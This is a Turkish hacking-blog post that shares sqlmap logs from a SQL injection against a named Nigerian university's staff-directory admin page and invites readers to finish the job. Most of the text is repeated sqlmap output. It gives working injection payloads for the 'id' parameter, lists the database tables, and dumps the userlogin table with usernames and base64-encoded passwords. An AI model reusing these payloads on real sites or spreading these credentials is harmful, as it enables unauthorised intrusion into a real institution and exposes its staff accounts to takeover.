Filename | Bazi Paylasilmis SQL Datalari |
Permission | rw-r--r-- |
Author | dr4cula |
Date and Time | 23:55 |
Label | DarkSide |
Action |
http://alhikmah.edu.ng/staff_dir/admin/
Direk Sqlmap'ten cektim loglari artik gerisi sizde kolay gelsin :)
sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5259=5259-- vojZ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1312 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(1312=1312,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WLRe
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: id=1';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4660 FROM (SELECT(SLEEP(5)))jBqf)-- xdrz
Type: UNION query
Title: Generic UNION query (NULL) - 21 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706a71,0x7a73497445614368444c746e6b636778696a6e596f584d49476f4477487a68446b7a75694a466868,0x717a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KAZA
---
back-end DBMS: MySQL >= 5.0
available databases [2]:
[*] alhikmah_staffdir
[*] information_schema
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5259=5259-- vojZ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1312 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(1312=1312,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WLRe
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: id=1';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4660 FROM (SELECT(SLEEP(5)))jBqf)-- xdrz
Type: UNION query
Title: Generic UNION query (NULL) - 21 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706a71,0x7a73497445614368444c746e6b636778696a6e596f584d49476f4477487a68446b7a75694a466868,0x717a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KAZA
---
back-end DBMS: MySQL >= 5.0
Database: alhikmah_staffdir
[8 tables]
+------------------+
| course_detail |
| departments |
| faculties |
| lecturer_profile |
| programs |
| title_tb |
| userinfo |
| userlogin |
+------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5259=5259-- vojZ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1312 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(1312=1312,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WLRe
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: id=1';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4660 FROM (SELECT(SLEEP(5)))jBqf)-- xdrz
Type: UNION query
Title: Generic UNION query (NULL) - 21 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706a71,0x7a73497445614368444c746e6b636778696a6e596f584d49476f4477487a68446b7a75694a466868,0x717a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KAZA
---
back-end DBMS: MySQL >= 5.0
Database: alhikmah_staffdir
[8 tables]
+------------------+
| course_detail |
| departments |
| faculties |
| lecturer_profile |
| programs |
| title_tb |
| userinfo |
| userlogin |
+------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5259=5259-- vojZ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1312 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(1312=1312,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WLRe
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: id=1';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4660 FROM (SELECT(SLEEP(5)))jBqf)-- xdrz
Type: UNION query
Title: Generic UNION query (NULL) - 21 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706a71,0x7a73497445614368444c746e6b636778696a6e596f584d49476f4477487a68446b7a75694a466868,0x717a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KAZA
---
back-end DBMS: MySQL >= 5.0
Database: alhikmah_staffdir
Table: userlogin
[6 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| eMail | varchar(250) |
| id | int(11) |
| password | blob |
| status | varchar(30) |
| type | varchar(250) |
| userName | varchar(250) |
+----------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5259=5259-- vojZ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1312 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(1312=1312,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WLRe
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: id=1';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4660 FROM (SELECT(SLEEP(5)))jBqf)-- xdrz
Type: UNION query
Title: Generic UNION query (NULL) - 21 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706a71,0x7a73497445614368444c746e6b636778696a6e596f584d49476f4477487a68446b7a75694a466868,0x717a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KAZA
---
back-end DBMS: MySQL >= 5.0
Database: alhikmah_staffdir
Table: userlogin
[4 entries]
+-------------+------------------+
| userName | password |
+-------------+------------------+
| admin2018 | d2lzZG9tOTlAQA== |
| odeyale2017 | b2RleWFsZTIwMTc= |
| abdul2018 | d2lzZG9tOTlAQA== |
| sdfdsfsd | ZmRzZmRz |
+-------------+------------------+
0 yorum:
Yorum Gönder